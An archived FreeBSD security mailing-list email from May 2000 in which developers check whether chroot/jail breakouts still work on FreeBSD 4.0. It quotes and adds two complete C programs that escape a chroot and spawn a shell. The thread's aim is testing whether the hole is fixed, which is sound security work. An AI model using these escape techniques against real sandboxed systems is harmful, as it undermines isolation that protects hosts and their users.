Date: Fri, 12 May 2000 20:06:19 +0200 From: Harold Gutch <logix@foobar.franken.de> To: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>, Poul-Henning Kamp <phk@critter.freebsd.dk> Cc: Paul Hart <hart@iserver.com>, Adam Laurie <adam@algroup.co.uk>, freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000512200619.A14067@foobar.franken.de> In-Reply-To: <200005121319.e4CDJev40777@cwsys.cwsent.com>; from Cy Schubert - ITSD Open Systems Group on Fri, May 12, 2000 at 06:19:06AM -0700 References: <4226.958118411@critter.freebsd.dk> <200005121319.e4CDJev40777@cwsys.cwsent.com>
next in thread | previous in thread | raw e-mail | index | archive | help
On Fri, May 12, 2000 at 06:19:06AM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> chrooted environment including jail, however testing the break out of
> jail exploit (good thing I tested before I spoke), which BTW worked on
> FreeBSD-3 and numerous other platforms including Linux, Solaris, and
> Tru64-UNIX, appears to no longer work under 4.0 -- which is a good
> thing! When did the FreeBSD chroot(2) get fixed?
>
> Once again FreeBSD leads the way.
>
> Following is the break-out-of-jail code.
>
> #include <unistd.h>
> #include <assert.h>
>
> const char *shell = "/bin/sh";
> const char *lowerdir = "/tmp";
>
> int main() {
> int i;
>
> assert(chdir("/") != -1);
> assert(chroot(lowerdir) != -1);
> for (i = 0; i < 32; i++)
> assert(chdir("..") != -1);
> assert(chroot(".") != -1);
>
> assert(execl(shell, shell, NULL) != -1);
> };
What about the "other" chroot-breakout, does it still work under
FreeBSD 4.0?
Here's the breakout-code modulo checks wether /tmp exists etc.
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
int handle, i;
handle = open("/", O_RDONLY);
chroot("/tmp");
chdir("/");
fchdir(handle);
for (i = 0; i < 32; i++)
chdir("..");
chroot(".");
chdir("/");
system("/bin/sh");
return 0;
}
bye,
Harold
--
Someone should do a study to find out how many human life spans have
been lost waiting for NT to reboot.
Ken Deboy on Dec 24 1999 in comp.unix.bsd.freebsd.misc
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20000512200619.A14067>